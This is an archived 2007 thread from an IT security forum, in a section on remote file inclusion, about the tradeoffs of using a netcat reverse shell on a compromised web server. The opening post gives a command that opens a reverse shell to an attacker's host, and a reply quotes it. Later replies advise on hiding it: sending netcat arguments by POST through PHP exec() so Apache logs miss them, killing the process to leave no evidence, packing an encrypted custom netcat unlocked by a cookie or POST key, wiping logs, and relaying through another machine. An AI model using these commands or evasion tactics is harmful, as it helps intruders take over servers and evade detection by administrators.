 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
reverse shell tradeoff |
 |
 Posted: Tue Jun 05, 2007 7:28 pm |
 |
|
| drag |
| Active user |
 |
|
| Joined: May 31, 2007 |
| Posts: 25 |
|
|
|
 |
|
 |
|
I was doing some reading on old posts and noticed multiple threads that suggest using a reverse shell with netcat. Although this seems quite useful (using the php shell sucks in some ways compared to a real one, and to bypass logs), it seems to me that there is a tradeoff. Using the reverse shell opens by using:
netcat -e /bin/sh yourhost 3333
necessitates you placing your source address into a running process. I'd imagine that this is more noticeable than having it within the logs (depending on the admin). Am I missing something that would make this more stealthy? Any comments? |
|
|
|
|
|
|
|
|
| Posted: Fri Jun 08, 2007 1:29 pm |
|
|
| y3dips |
| Valuable expert |
 |
|
| Joined: Feb 25, 2005 |
| Posts: 281 |
| Location: Indonesia |
|
|
|
|
|
|
the idea is, by using a reverse shell u would able to execute a shell rather than put some shell backdoor on victim (because a rule at victims firewall), you know sometimes you need to execute some command on victim box.
I agree, your ip will be logged, but do you think your connection (accessing the web for some php remote file inclusion) arent log either ?
so, u need some "covering track" mechanism, old time ago there was a
remove.c" , i think u can find a toushand or u can made one,
or, u could find some machine in some "other place" to receive your "reverse shell" |
|
_________________
IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
|
Re: reverse shell tradeoff |
|
| Posted: Fri Jun 08, 2007 10:23 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| drag wrote: | I was doing some reading on old posts and noticed multiple threads that suggest using a reverse shell with netcat. Although this seems quite useful (using the php shell sucks in some ways compared to a real one, and to bypass logs), it seems to me that there is a tradeoff. Using the reverse shell opens by using:
netcat -e /bin/sh yourhost 3333
necessitates you placing your source address into a running process. I'd imagine that this is more noticeable than having it within the logs (depending on the admin). Am I missing something that would make this more stealthy? Any comments? |
First: if we want to "execute" netcat from php's exec() or system(), then by using POST method for delivering commandline arguments for netcat we can probably evade logging host and port to apache logs.
Second: after shell using netcat process must be killed. So no evidence stays.
Still I have vision for more paranoid uses:
Let's assume, that netcat is encrypted and wrapped to external file, which will receive encryption key from $_POST or $_COOKIE vector and then will unpack payload, containing netcat. And netcat itself is modified version, which has all needed information inside, so it does not need any command line parameters.
If somehow that encrypted file stays to hdd (if attacker for some reason forgets to delete traces), then it is practically impossible to decrypt it, because the key is unknown and can't be found from Apache logs.
Conclusion - best tools are manually modified and improved opensource tools  |
|
|
|
|
|
|
Re: reverse shell tradeoff |
|
| Posted: Sun Jun 10, 2007 2:52 am |
|
|
| y3dips |
| Valuable expert |
|
|
| Joined: Feb 25, 2005 |
| Posts: 281 |
| Location: Indonesia |
|
|
|
|
|
|
| waraxe wrote: |
First: if we want to "execute" netcat from php's exec() or system(), then by using POST method for delivering commandline arguments for netcat we can probably evade logging host and port to apache logs.
Second: after shell using netcat process must be killed. So no evidence stays.
Still I have vision for more paranoid uses:
Let's assume, that netcat is encrypted and wrapped to external file, which will receive encryption key from $_POST or $_COOKIE vector and then will unpack payload, containing netcat. And netcat itself is modified version, which has all needed information inside, so it does not need any command line parameters.
If somehow that encrypted file stays to hdd (if attacker for some reason forgets to delete traces), then it is practically impossible to decrypt it, because the key is unknown and can't be found from Apache logs.
Conclusion - best tools are manually modified and improved opensource tools |
CMIIW, So i think waraxe try to say "made your own tools for e.g your own netcat"  , its an unusual ways so its hard to trace (by IDS, IPS, rkhunter tools and other dig forensic tools because it wouldnt be in there database/pattern).
but as far as i know, being anonymous is not "always" without a log, i rather fake it or use another "character"
SOL |
|
_________________
IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
|
www.waraxe.us Forum Index -> Remote file inclusion
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 231
Members: 0
Total: 231
